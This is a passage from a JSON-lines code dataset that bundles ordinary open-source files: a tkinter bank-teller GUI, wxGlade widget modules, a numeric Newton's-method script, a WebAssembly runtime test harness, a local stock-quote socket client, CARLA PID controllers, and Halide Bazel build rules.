window.destroy()\n\n def withdraw_gui(self):\n withdraw_window = tk.Toplevel(self.window)\n withdraw_window.title(\"Withdraw Money\")\n\n amount_label = tk.Label(withdraw_window, text=\"Enter the amount to withdraw:\")\n amount_label.pack()\n\n amount_entry = tk.Entry(withdraw_window)\n amount_entry.pack()\n\n confirm_button = tk.Button(withdraw_window, text=\"Confirm\", command=lambda: self.withdraw(amount_entry.get(), withdraw_window))\n confirm_button.pack()\n\n # Center the window\n window_width = 300\n window_height = 200\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n withdraw_window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\n def deposit_gui(self):\n deposit_window = tk.Toplevel(self.window)\n deposit_window.title(\"Deposit Money\")\n\n amount_label = tk.Label(deposit_window, text=\"Enter the amount to deposit:\")\n amount_label.pack()\n\n amount_entry = tk.Entry(deposit_window)\n amount_entry.pack()\n\n confirm_button = tk.Button(deposit_window, text=\"Confirm\", command=lambda: self.deposit(amount_entry.get(), deposit_window))\n confirm_button.pack()\n\n # Center the window\n window_width = 300\n window_height = 200\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n deposit_window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\n def send_gui(self):\n send_window = tk.Toplevel(self.window)\n send_window.title(\"Send Money\")\n\n receiver_label = tk.Label(send_window, text=\"Enter the receiver's card number:\")\n receiver_label.pack()\n\n receiver_entry = tk.Entry(send_window)\n receiver_entry.pack()\n\n amount_label = tk.Label(send_window, text=\"Enter the amount to send:\")\n amount_label.pack()\n\n amount_entry = tk.Entry(send_window)\n amount_entry.pack()\n\n confirm_button = tk.Button(send_window, text=\"Confirm\", command=lambda: self.send(receiver_entry.get(), amount_entry.get(), send_window))\n confirm_button.pack()\n\n # Center the window\n window_width = 300\n window_height = 200\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n send_window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\nif __name__ == \"__main__\":\n bank_teller = BankTeller()\n\n","repo_name":"alejandrovt6/Python-projects","sub_path":"06-Bank-teller.py","file_name":"06-Bank-teller.py","file_ext":"py","file_size_in_byte":6949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17084115273","text":"import wx\nimport common, config\nfrom edit_windows import ManagedBase, EditStylesMixin\nfrom tree import Node\nimport new_properties as np\nfrom misc import wxGladeRadioButton\n\n\nclass EditRadioButton(ManagedBase, EditStylesMixin):\n \"Class to handle wxRadioButton objects\"\n update_widget_style = False\n\n _PROPERTIES = [\"Widget\", \"label\", \"clicked\", \"style\"]\n PROPERTIES = ManagedBase.PROPERTIES + _PROPERTIES + ManagedBase.EXTRA_PROPERTIES\n\n def __init__(self, name, parent, id, label, sizer, pos):\n ManagedBase.__init__(self, name, 'wxRadioButton', parent, id, sizer, pos)\n EditStylesMixin.__init__(self)\n\n # initialise instance properties\n self.label = np.TextProperty(\"\", multiline=True, fixed_height=True)\n self.clicked = np.CheckBoxProperty(False, default_value=False)\n\n if config.preferences.default_border:\n self.border.set( config.preferences.default_border_size )\n self.flag.set( wx.ALL )\n\n def create_widget(self):\n self.widget = wxGladeRadioButton(self.parent.widget, self.id, self.label)\n self.widget.SetValue(self.clicked)\n wx.EVT_CHECKBOX(self.widget, self.id, lambda e: self.widget.SetValue(self.value))\n\n def _set_label(self):\n if not self.widget: return\n self.widget.SetLabel(self.label)\n if not self.properties['size'].is_active(): # XXX changed this: '-1, -1' is identical to not active\n self.sizer.set_item(self.pos, size=self.widget.GetBestSize())\n\n def properties_changed(self, modified):\n resize = False\n\n if not modified or \"label\" in modified: self._set_label()\n\n if not modified or \"clicked\" in modified and self.widget:\n self.widget.SetValue(self.clicked)\n\n ManagedBase.properties_changed(self, modified)\n\n\n\ndef builder(parent, sizer, pos, number=[1]):\n \"factory function for EditRadioButton objects\"\n label = u'radio_btn_%d' % number[0]\n while common.app_tree.has_name(label):\n number[0] += 1\n label = u'radio_btn_%d' % number[0]\n radio = EditRadioButton(label, parent, wx.NewId(), label, sizer, pos)\n node = Node(radio)\n radio.node = node\n if parent.widget: radio.create()\n common.app_tree.insert(node, sizer.node, pos-1)\n\n\ndef xml_builder(attrs, parent, sizer, sizeritem, pos=None):\n \"factory to build EditRadioButton objects from a XML file\"\n from xml_parse import XmlParsingError\n try:\n label = attrs['name']\n except KeyError:\n raise XmlParsingError(_(\"'name' attribute missing\"))\n if sizer is None or sizeritem is None:\n raise XmlParsingError(_(\"sizer or sizeritem object cannot be None\"))\n radio = EditRadioButton(label, parent, wx.NewId(), \"\", sizer, pos)\n sizer.set_item(radio.pos, proportion=sizeritem.proportion, flag=sizeritem.flag, border=sizeritem.border)\n node = Node(radio)\n radio.node = node\n if pos is None:\n common.app_tree.add(node, sizer.node)\n else:\n common.app_tree.insert(node, sizer.node, pos-1)\n return radio\n\n\ndef initialize():\n \"initialization function for the module: returns a wx.BitmapButton to be added to the main palette\"\n common.widgets['EditRadioButton'] = builder\n common.widgets_from_xml['EditRadioButton'] = xml_builder\n\n return common.make_object_button('EditRadioButton', 'radio_button.xpm')\n","repo_name":"FreePLC/FreePLC_IDE","sub_path":"IDE_Source/python/Lib/site-packages/wxglade/widgets/radio_button/radio_button.py","file_name":"radio_button.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"40413890948","text":"\nimport numpy as np\nfrom scipy.special import expit\n\nX = np.array([[0.2, 3.1, 1.0], [1.0, 3.0, 1.0], [-0.2, 1.2, 1.0], [1.0, 1.1, 1.0]])\ny = np.array([[1], [1], [0], [0]])\nw0 = [[-1.0], [1.0], [0.0]]\ns0 = expit(X.dot(w0))\n\n\ndef newton(w, s, x, d):\n pseudo_inv = np.linalg.inv(np.transpose(x).dot(x)).dot(np.transpose(x))\n end = ((s * (1 - s)) ** -1) * (s - d)\n return w - pseudo_inv.dot(end)\n\n\nw1 = newton(w0, s0, X, y)\ns1 = expit(X.dot(w1))\nw2 = newton(w1, s1, X, y)\ns2 = expit(X.dot(w2))\n","repo_name":"matangrinberg/cs289","sub_path":"hw4/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73514230489","text":"#!/home/zph/anaconda3/bin/python\nfrom pathlib import Path\nimport re\nfrom extract_dump import are_different, at_least_one_can_instantiate\nfrom exec_util import exec_one_tc, exec_one_tc_mth\nfrom extract_dump import dumpData\nfrom file_util import check_dir\nfrom file_util import print_ba\nfrom get_impls_util import get_std_impls\nimport os\nimport sys\nfrom stack_val_analyze.stack_val_analyze_util import cleanedStackVal\nfrom extract_dump.analyze_exec_instant import _get_can_execute_num\nfrom get_impls_util import get_std_release_impls\ndebug_impls = get_std_impls()\n# release_impls = get_std_release_impls()\n\n\ndef test_env(tc_name, reload=False, reload_dir=None, use_release=False):\n if use_release:\n # impls = release_impls\n pass\n else:\n impls = debug_impls\n for impl in impls:\n print(impl.executor.dump_cmd_fmt)\n print(impl.executor._result_paths)\n if Path(tc_name).exists():\n tc_path = tc_name\n tc_name = Path(tc_name).stem\n else:\n tc_path = 'tcs/{}.wasm'.format(tc_name)\n if reload:\n reload_dir = Path(reload_dir)\n name = Path(tc_path).name\n name = re.sub(r'\\.wasm', '', name)\n tc_dumped_data_dir = reload_dir / name\n print(tc_dumped_data_dir)\n else:\n result_base_dir = 'results/one_tc_result'\n os.system('rm -rf {}'.format(result_base_dir))\n result_base_dir = check_dir(result_base_dir)\n tc_dumped_data_dir = check_dir(result_base_dir / tc_name)\n dumped_results = exec_one_tc_mth(impls, tc_path, tc_dumped_data_dir, tc_dumped_data_dir)\n\n for dumped_result in dumped_results:\n print(f'dumped_result.name: {dumped_result.name};;dumped_result.can_initialize: {dumped_result.can_initialize} ;; dumped_result.has_crash: {dumped_result.has_crash} {dumped_result.log_has_failed_content}')\n print(dumped_result.stack_bytes_process_nan)\n if dumped_result.name == 'wasm3_dump':\n print('wasm3_dump')\n print(dumped_result.default_mem_length, dumped_result.mem_num, dumped_result.default_mem_page_num)\n print('------------------')\n if dumped_result.name == 'wasmer_default_dump':\n print('wasmer_default_dump')\n print(dumped_result.default_mem_length, dumped_result.mem_num, dumped_result.default_mem_page_num)\n print('---' * 10)\n\n difference_reason = are_different(dumped_results)\n\n diff_keys = []\n if not isinstance(difference_reason, bool):\n for r in difference_reason.values():\n diff_keys.extend(r)\n print('Difference reason:')\n print(difference_reason)\n print('=' * 50)\n print(diff_keys)\n print(at_least_one_can_instantiate(dumped_results))\n\n\nif __name__ == '__main__':\n argv = sys.argv\n assert len(argv) == 2\n tc_path = argv[1]\n test_env(tc_path, False, 'result/one',use_release=False)\n\n","repo_name":"erxiaozhou/cp912_runtime_tester","sub_path":"run_one_tc_std_testing.py","file_name":"run_one_tc_std_testing.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"570829345","text":"import socket\r\nimport win32api\r\nimport TypeDataTryd as tdt\r\nfrom TimesAndTrades.OutputTimesTrades import OutputTimesTrades\r\n\r\n#---ESCOLHER O ATIVO EXEMPLO:-----------#\r\n# PETR4 - Petrobras\r\n# VALE3 - Vale\r\n# ITUB4 - Itau\r\n# INDQ19 - Indice Bovespa\r\n# WINQ19 - Mini Indice Bovespa\r\n#========================================#\r\nATIVO = 'WINQ19'\r\n#========================================#\r\n\r\n#---INFORMACOES DO SERVIDOR--------------#\r\n#========================================#\r\nHOST = '127.0.0.1'\r\nPORT = 12002\r\n#========================================#\r\n\r\n#---OPCAO DE COTACAO---------------------#\r\n#========================================#\r\n\r\n#========================================#\r\n\r\ndef ByteConvert(dataInfo):\r\n return str.encode(dataInfo + ATIVO + '#')\r\n\r\n#Inicia a Execução\r\nott = OutputTimesTrades()\r\ntry:\r\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n s.connect((HOST, PORT))\r\n print(\"Id da thread principal %d\" % (win32api.GetCurrentThreadId()))\r\n while True:\r\n try:\r\n s.sendall(ByteConvert(tdt.NEGOCIO_COMPLETO) )\r\n data = s.recv(32768)\r\n ott.OutputData(data.decode())\t\t\r\n except Exception as ex:\r\n print(ex)\r\n \r\nexcept Exception as ex:\r\n print('Não foi possivel conectar no servidor RTD. Erro: ', ex)\r\n","repo_name":"romeubertho/FinancialData","sub_path":"StartConnTryd.py","file_name":"StartConnTryd.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"17083754813","text":"import wx\n\nimport common, config\nfrom edit_windows import ManagedBase, EditStylesMixin\nfrom gui_mixins import BitmapMixin\nfrom tree import Node\nimport new_properties as np\n\n\nclass EditBitmapButton(ManagedBase, EditStylesMixin, BitmapMixin):\n \"Class to handle wxBitmapButton objects\"\n\n _PROPERTIES = [\"Widget\", \"bitmap\", \"disabled_bitmap\", \"default\", \"style\"]\n PROPERTIES = ManagedBase.PROPERTIES + _PROPERTIES + ManagedBase.EXTRA_PROPERTIES\n\n _PROPERTY_HELP = {\"bitmap\": BitmapMixin.bitmap_tooltip_text,\n \"disabled_bitmap\": BitmapMixin.bitmap_tooltip_text}\n\n def __init__(self, name, parent, id, bmp_file, sizer, pos):\n ManagedBase.__init__(self, name, 'wxBitmapButton', parent, id, sizer, pos)\n EditStylesMixin.__init__(self)\n BitmapMixin.__init__(self)\n\n # initialise instance properties\n filedialog_style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST # for the following two properties\n self.bitmap = np.FileNameProperty(bmp_file, style=filedialog_style)\n self.disabled_bitmap = np.FileNamePropertyD(\"\", default_value=\"\", style=filedialog_style)\n self.default = np.CheckBoxProperty(False)\n\n if config.preferences.default_border:\n self.border.set( config.preferences.default_border_size )\n self.flag.set( wx.ALL )\n\n\n def create_widget(self):\n bmp = self.get_preview_obj_bitmap()\n #try:\n self.widget = wx.BitmapButton(self.parent.widget, self.id, bmp, style=self.style)\n if self.disabled_bitmap:\n bmp = self.get_preview_obj_bitmap(self.disabled_bitmap)\n self.widget.SetBitmapDisabled(bmp)\n\n #except AttributeError:\n #self.widget = wx.BitmapButton(self.parent.widget, self.id, bmp)\n\n def properties_changed(self, modified=None):\n \"update label (and size if label/stockitem have changed)\"\n if self.widget:\n resize = False\n if not modified or \"bitmap\" in modified:\n bmp = self.get_preview_obj_bitmap(self.bitmap)\n self.widget.SetBitmapLabel(bmp)\n self.widget.SetBitmapSelected(bmp)\n self.widget.SetBitmapFocus(bmp)\n resize = True\n if not modified or \"disabled_bitmap\" in modified:\n bmp = self.get_preview_obj_bitmap(self.disabled_bitmap)\n self.widget.SetBitmapDisabled(bmp)\n resize = True\n\n if resize: self._set_widget_best_size()\n #size_p = self.properties[\"size\"]\n #if resize and size_p.get()==\"-1, -1\":\n #self.sizer.set_item(self.pos, size=self.widget.GetBestSize())\n #if not size_p.is_active():\n #size_p.set( self.widget.GetBestSize() )\n\n ManagedBase.properties_changed(self, modified)\n\n\ndef builder(parent, sizer, pos, number=[1]):\n \"factory function for EditBitmapButton objects\"\n name = 'bitmap_button_%s' % number[0]\n while common.app_tree.has_name(name):\n number[0] += 1\n name = 'bitmap_button_%s' % number[0]\n bitmap = wx.FileSelector(_(\"Select the image for the button\"))\n button = EditBitmapButton(name, parent, wx.NewId(), bitmap, sizer, pos)\n node = Node(button)\n button.node = node\n if parent.widget: button.create()\n common.app_tree.insert(node, sizer.node, pos-1)\n\n\ndef xml_builder(attrs, parent, sizer, sizeritem, pos=None):\n \"factory to build EditBitmapButton objects from a XML file\"\n from xml_parse import XmlParsingError\n try:\n label = attrs['name']\n except KeyError:\n raise XmlParsingError(_(\"'name' attribute missing\"))\n if sizer is None or sizeritem is None:\n raise XmlParsingError(_(\"sizer or sizeritem object cannot be None\"))\n button = EditBitmapButton(label, parent, wx.NewId(), '', sizer, pos)\n sizer.set_item(button.pos, proportion=sizeritem.proportion, flag=sizeritem.flag, border=sizeritem.border)\n node = Node(button)\n button.node = node\n if pos is None:\n common.app_tree.add(node, sizer.node)\n else:\n common.app_tree.insert(node, sizer.node, pos-1)\n return button\n\n\ndef initialize():\n \"initialization function for the module: returns a wxBitmapButton to be added to the main palette\"\n common.widgets['EditBitmapButton'] = builder\n common.widgets_from_xml['EditBitmapButton'] = xml_builder\n\n return common.make_object_button('EditBitmapButton', 'bitmap_button.xpm')\n","repo_name":"FreePLC/FreePLC_IDE","sub_path":"IDE_Source/python/Lib/site-packages/wxglade/widgets/bitmap_button/bitmap_button.py","file_name":"bitmap_button.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"34550974082","text":"import glob\nimport os\nimport sys\nimport random\nimport time\nimport numpy as np\nimport math\nimport weakref\nfrom collections import deque\n\nimport numpy as np\n\nclass PIDLongitudinalController():\n def __init__(self, K_P=1.0, K_I=0.0, K_D=0.0, dt=0.03):\n self._k_p = K_P\n self._k_i = K_I\n self._k_d = K_D\n self._dt = dt\n self._error_buffer = deque(maxlen=10)\n\n\n def run_step(self, target_speed, current_speed):\n error = target_speed - current_speed\n self._error_buffer.append(error)\n\n if len(self._error_buffer) >= 2:\n _de = (self._error_buffer[-1] - self._error_buffer[-2]) / self._dt\n _ie = sum(self._error_buffer) * self._dt\n else:\n _de = 0.0\n _ie = 0.0\n\n return np.clip((self._k_p * error) + (self._k_d * _de) + (self._k_i * _ie), -1.0, 1.0)\n \n def reset(self):\n self._error_buffer.clear()\n\n\n\nclass PIDLateralController():\n def __init__(self, offset=0, K_P=1.0, K_I=0.0, K_D=0.0, dt=0.03):\n self._k_p = K_P\n self._k_i = K_I\n self._k_d = K_D\n self._dt = dt\n self._offset = offset\n self._e_buffer = deque(maxlen=10)\n\n\n def run_step(self, target_transform, vehicle_transform):\n \"\"\"\n Estimate the steering angle of the vehicle based on the PID equations\n\n :param waypoint: target waypoint\n :param vehicle_transform: current transform of the vehicle\n :return: steering control in the range [-1, 1]\n \"\"\"\n # Get the ego's location and forward vector\n ego_loc = vehicle_transform.location\n v_vec = vehicle_transform.get_forward_vector()\n v_vec = np.array([v_vec.x, v_vec.y, 0.0])\n\n # Get the vector vehicle-target_wp\n if self._offset != 0:\n r_vec = target_transform.get_right_vector()\n w_loc = target_transform.location + carla.Location(x=self._offset*r_vec.x,\n y=self._offset*r_vec.y)\n else:\n w_loc = target_transform.location\n\n w_vec = np.array([w_loc.x - ego_loc.x,\n w_loc.y - ego_loc.y,\n 0.0])\n\n wv_linalg = np.linalg.norm(w_vec) * np.linalg.norm(v_vec)\n if wv_linalg == 0:\n _dot = 1\n else:\n _dot = math.acos(np.clip(np.dot(w_vec, v_vec) / (wv_linalg), -1.0, 1.0))\n _cross = np.cross(v_vec, w_vec)\n if _cross[2] < 0:\n _dot *= -1.0\n\n self._e_buffer.append(_dot)\n if len(self._e_buffer) >= 2:\n _de = (self._e_buffer[-1] - self._e_buffer[-2]) / self._dt\n _ie = sum(self._e_buffer) * self._dt\n else:\n _de = 0.0\n _ie = 0.0\n\n return np.clip((self._k_p * _dot) + (self._k_d * _de) + (self._k_i * _ie), -1.0, 1.0)\n\n def reset(self):\n self._e_buffer.clear()","repo_name":"boratw/carla-sff","sub_path":"algorithm/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74326136089","text":"load(\"@bazel_skylib//lib:collections.bzl\", \"collections\")\nload(\"@bazel_tools//tools/cpp:toolchain_utils.bzl\", \"use_cpp_toolchain\")\n\ndef halide_language_copts():\n _common_opts = [\n \"-fPIC\",\n \"-frtti\",\n \"-Wno-conversion\",\n \"-Wno-sign-compare\",\n ]\n _posix_opts = [\n \"$(STACK_FRAME_UNLIMITED)\",\n \"-fno-exceptions\",\n \"-funwind-tables\",\n \"-fvisibility-inlines-hidden\",\n ]\n _msvc_opts = [\n \"-D_CRT_SECURE_NO_WARNINGS\",\n \"/MD\",\n ]\n return _common_opts + select({\n \"//conditions:default\": _posix_opts,\n \"@mediapipe//mediapipe:windows\": _msvc_opts,\n })\n\ndef halide_language_linkopts():\n _linux_opts = [\n \"-ldl\",\n \"-lpthread\",\n \"-lz\",\n \"-rdynamic\",\n ]\n _osx_opts = [\n \"-lz\",\n \"-Wl,-stack_size\",\n \"-Wl,1000000\",\n ]\n _msvc_opts = []\n return select({\n \"//conditions:default\": _linux_opts,\n \"@mediapipe//mediapipe:macos\": _osx_opts,\n \"@mediapipe//mediapipe:windows\": _msvc_opts,\n })\n\ndef halide_runtime_linkopts():\n \"\"\" Return the linkopts needed when linking against halide_library_runtime.\n\n Returns:\n List to be used for linkopts.\n \"\"\"\n _posix_opts = [\n \"-ldl\",\n \"-lpthread\",\n ]\n _android_opts = [\n \"-llog\",\n ]\n _msvc_opts = []\n\n return select({\n \"//conditions:default\": _posix_opts,\n \"@mediapipe//mediapipe:android\": _android_opts,\n \"@mediapipe//mediapipe:windows\": _msvc_opts,\n })\n\n# Map of halide-target-base -> config_settings\n_HALIDE_TARGET_CONFIG_SETTINGS_MAP = {\n # Android\n \"arm-32-android\": [\"@mediapipe//mediapipe:android_arm\"],\n \"arm-64-android\": [\"@mediapipe//mediapipe:android_arm64\"],\n \"x86-32-android\": [\"@mediapipe//mediapipe:android_x86\"],\n \"x86-64-android\": [\"@mediapipe//mediapipe:android_x86_64\"],\n # iOS\n \"arm-32-ios\": [\"@mediapipe//mediapipe:ios_armv7\"],\n \"arm-64-ios\": [\"@mediapipe//mediapipe:ios_arm64\", \"@mediapipe//mediapipe:ios_arm64e\"],\n # OSX (or iOS simulator)\n \"x86-32-osx\": [\"@mediapipe//mediapipe:ios_i386\"],\n \"x86-64-osx\": [\"@mediapipe//mediapipe:macos_x86_64\", \"@mediapipe//mediapipe:ios_x86_64\"],\n \"arm-64-osx\": [\"@mediapipe//mediapipe:macos_arm64\"],\n # Windows\n \"x86-64-windows\": [\"@mediapipe//mediapipe:windows\"],\n # Linux\n \"x86-64-linux\": [\"@mediapipe//mediapipe:linux\"],\n # Deliberately no //condition:default clause here.\n}\n\n_HALIDE_TARGET_MAP_DEFAULT = {\n \"x86-64-linux\": [\n \"x86-64-linux-sse41-avx-avx2-fma\",\n \"x86-64-linux-sse41\",\n \"x86-64-linux\",\n ],\n \"x86-64-osx\": [\n \"x86-64-osx-sse41-avx-avx2-fma\",\n \"x86-64-osx-sse41\",\n \"x86-64-osx\",\n ],\n \"x86-64-windows\": [\n \"x86-64-windows-sse41-avx-avx2-fma\",\n \"x86-64-windows-sse41\",\n \"x86-64-windows\",\n ],\n}\n\ndef halide_library_default_target_map():\n return _HALIDE_TARGET_MAP_DEFAULT\n\n# Alphabetizes the features part of the target to make sure they always match no\n# matter the concatenation order of the target string pieces.\ndef _canonicalize_target(halide_target):\n if halide_target == \"host\":\n return halide_target\n if \",\" in halide_target:\n fail(\"Multitarget may not be specified here\")\n tokens = halide_target.split(\"-\")\n if len(tokens) < 3:\n fail(\"Illegal target: %s\" % halide_target)\n\n # rejoin the tokens with the features sorted\n return \"-\".join(tokens[0:3] + sorted(tokens[3:]))\n\n# Converts comma and dash separators to underscore and alphabetizes\n# the features part of the target to make sure they always match no\n# matter the concatenation order of the target string pieces.\ndef _halide_target_to_bazel_rule_name(multitarget):\n subtargets = multitarget.split(\",\")\n subtargets = [_canonicalize_target(st).replace(\"-\", \"_\") for st in subtargets]\n return \"_\".join(subtargets)\n\n# The second argument is True if there is a separate file generated\n# for each subtarget of a multitarget output, False if not. The third\n# argument is True if the output is a directory (vs. a single file).\n# The fourth argument is a list of output group(s) that the files should\n# be added to.\n\n_is_multi = True\n_is_single = False\n_is_file = False\n\n_output_extensions = {\n \"assembly\": (\"s\", _is_multi, _is_file, []),\n \"bitcode\": (\"bc\", _is_multi, _is_file, [\"generated_bitcode\"]),\n \"c_header\": (\"h\", _is_single, _is_file, [\"generated_headers\"]),\n \"c_source\": (\"halide_generated.cpp\", _is_multi, _is_file, []),\n \"compiler_log\": (\"halide_compiler_log\", _is_single, _is_file, [\"generated_object\", \"generated_compiler_log\"]),\n \"cpp_stub\": (\"stub.h\", _is_single, _is_file, []),\n \"featurization\": (\"featurization\", _is_multi, _is_file, []),\n \"llvm_assembly\": (\"ll\", _is_multi, _is_file, []),\n \"object\": (\"o\", _is_single, _is_file, [\"generated_object\"]),\n \"python_extension\": (\"py.cpp\", _is_single, _is_file, []),\n \"registration\": (\"registration.cpp\", _is_single, _is_file, [\"generated_registration\"]),\n \"schedule\": (\"schedule.h\", _is_single, _is_file, []),\n \"static_library\": (\"a\", _is_single, _is_file, [\"generated_object\"]),\n \"stmt\": (\"stmt\", _is_multi, _is_file, []),\n \"stmt_html\": (\"stmt.html\", _is_multi, _is_file, []),\n}\n\ndef _add_output_file(f, fmt, output_files, output_dict, verbose_extra_outputs, verbose_output_paths):\n if fmt in verbose_extra_outputs:\n verbose_output_paths.append(f.path)\n output_files.append(f)\n if fmt in _output_extensions:\n for group in _output_extensions[fmt][3]:\n output_dict.setdefault(group, []).append(f)\n\nHalideFunctionNameInfo = provider(fields = [\"function_name\"])\nHalideGeneratorBinaryInfo = provider(fields = [\"generator_binary\"])\nHalideGeneratorNameInfo = provider(fields = [\"generator_name_\"])\nHalideGeneratorParamsInfo = provider(fields = [\"generator_params\"])\nHalideLibraryNameInfo = provider(fields = [\"library_name\"])\nHalideTargetFeaturesInfo = provider(fields = [\"target_features\"])\n\ndef _gengen_closure_impl(ctx):\n return [\n HalideGeneratorBinaryInfo(generator_binary = ctx.attr.generator_binary),\n HalideGeneratorNameInfo(generator_name_ = ctx.attr.generator_name_),\n ]\n\n_gengen_closure = rule(\n implementation = _gengen_closure_impl,\n attrs = {\n \"generator_binary\": attr.label(\n executable = True,\n allow_files = True,\n mandatory = True,\n cfg = \"exec\",\n ),\n # \"generator_name\" is apparently reserved by Bazel for attrs in rules\n \"generator_name_\": attr.string(mandatory = True),\n },\n provides = [HalideGeneratorBinaryInfo, HalideGeneratorNameInfo],\n)\n\ndef _halide_library_instance_impl(ctx):\n generator_binary = ctx.attr.generator_closure[HalideGeneratorBinaryInfo].generator_binary if ctx.attr.generator_closure else \"\"\n generator_name = ctx.attr.generator_closure[HalideGeneratorNameInfo].generator_name_ if ctx.attr.generator_closure else \"\"\n return [\n HalideFunctionNameInfo(function_name = ctx.attr.function_name),\n HalideGeneratorBinaryInfo(generator_binary = generator_binary),\n HalideGeneratorNameInfo(generator_name_ = generator_name),\n HalideGeneratorParamsInfo(generator_params = ctx.attr.generator_params),\n HalideLibraryNameInfo(library_name = ctx.attr.library_name),\n HalideTargetFeaturesInfo(target_features = ctx.attr.target_features),\n ]\n\n_halide_library_instance = rule(\n implementation = _halide_library_instance_impl,\n attrs = {\n \"function_name\": attr.string(),\n \"generator_closure\": attr.label(\n cfg = \"exec\",\n providers = [HalideGeneratorBinaryInfo, HalideGeneratorNameInfo],\n ),\n \"generator_params\": attr.string_list(),\n \"library_name\": attr.string(),\n \"target_features\": attr.string_list(),\n },\n provides = [\n HalideFunctionNameInfo,\n HalideGeneratorBinaryInfo,\n HalideGeneratorNameInfo,\n HalideGeneratorParamsInfo,\n HalideLibraryNameInfo,\n HalideTargetFeaturesInfo,\n ],\n)\n\ndef _gengen_impl(ctx):\n if _has_dupes(ctx.attr.requested_outputs):\n fail(\"Duplicate values in outputs: \" + str(ctx.attr.requested_outputs))\n\n function_name = ctx.attr.function_name[HalideFunctionNameInfo].function_name if ctx.attr.function_name else \"\"\n generator_binary = ctx.attr.generator_binary[HalideGeneratorBinaryInfo].generator_binary if ctx.attr.generator_binary else \"\"\n generator_name_ = ctx.attr.generator_name_[HalideGeneratorNameInfo].generator_name_ if ctx.attr.generator_name_ else \"\"\n generator_params = ctx.attr.generator_params[HalideGeneratorParamsInfo].generator_params if ctx.attr.generator_params else []\n library_name = ctx.attr.library_name[HalideLibraryNameInfo].library_name if ctx.attr.library_name else \"\"\n target_features = ctx.attr.target_features[HalideTargetFeaturesInfo].target_features if ctx.attr.target_features else []\n\n for gp in generator_params:\n if \" \" in gp:\n fail(\"%s: Entries in generator_params must not contain spaces.\" % library_name)\n\n # Escape backslashes and double quotes.\n generator_params = [gp.replace(\"\\\\\", '\\\\\\\\\"').replace('\"', '\\\\\"') for gp in generator_params]\n\n execution_requirements = {}\n\n # --- Calculate the output type(s) we're going to produce (and which ones should be verbose)\n quiet_extra_outputs = []\n verbose_extra_outputs = []\n if ctx.attr.consider_halide_extra_outputs:\n if \"halide_extra_outputs\" in ctx.var:\n verbose_extra_outputs = ctx.var.get(\"halide_extra_outputs\", \"\").split(\",\")\n if \"halide_extra_outputs_quiet\" in ctx.var:\n quiet_extra_outputs = ctx.var.get(\"halide_extra_outputs_quiet\", \"\").split(\",\")\n requested_outputs = sorted(collections.uniq(ctx.attr.requested_outputs +\n verbose_extra_outputs +\n quiet_extra_outputs))\n\n # --- Assemble halide_target, adding extra features if necessary\n base_target = ctx.attr.halide_base_target\n if \",\" in base_target:\n fail(\"halide_base_target should never be a multitarget\")\n if len(base_target.split(\"-\")) != 3:\n fail(\"halide_base_target should have exactly 3 components\")\n\n target_features = target_features + ctx.var.get(\"halide_target_features\", \"\").split(\",\")\n\n if \"no_runtime\" in target_features:\n fail(\"Specifying 'no_runtime' in halide_target_features is not supported; \" +\n \"please add 'add_halide_runtime_deps = False' to the halide_library() rule instead.\")\n\n for san in [\"asan\", \"msan\", \"tsan\"]:\n if san in target_features:\n fail(\"halide_library doesn't support '%s' in halide_target_features; please build with --config=%s instead.\" % (san, san))\n\n # Append the features common to everything.\n target_features.append(\"c_plus_plus_name_mangling\")\n target_features.append(\"no_runtime\")\n\n # Make it all neat and tidy.\n target_features = sorted(collections.uniq(target_features))\n\n # Get the multitarget list (if any) from halide_target_map\n halide_targets = ctx.attr.halide_target_map.get(base_target, [base_target])\n\n # Add the extra features to all of them\n halide_targets = _add_features_to_all(halide_targets, target_features)\n\n leaf_name = ctx.attr.filename.split(\"/\")[-1]\n\n output_files = []\n output_dict = {}\n verbose_output_paths = []\n inputs = []\n\n env = {\n \"HL_DEBUG_CODEGEN\": str(ctx.var.get(\"halide_debug_codegen\", 0)),\n # --define halide_llvm_args=-time-passes is a typical usage\n \"HL_LLVM_ARGS\": str(ctx.var.get(\"halide_llvm_args\", \"\")),\n }\n\n be_very_quiet = ctx.var.get(\"halide_experimental_quiet\", False) # I'm hunting wabbit...\n\n # --- Calculate the final set of output files\n for fmt in requested_outputs:\n if fmt not in _output_extensions:\n fail(\"Unknown Halide output '%s'; known outputs are %s\" %\n (fmt, sorted(_output_extensions.keys())))\n ext, is_multiple, is_dir, _ = _output_extensions[fmt]\n\n # Special-case Windows file extensions\n if \"windows\" in halide_targets[-1]:\n if ext == \"o\":\n ext = \"obj\"\n if ext == \"a\":\n ext = \"lib\"\n if is_multiple and len(halide_targets) > 1:\n for h in halide_targets:\n suffix = _canonicalize_target(h)\n name = \"%s-%s.%s\" % (ctx.attr.filename, suffix, ext)\n f = 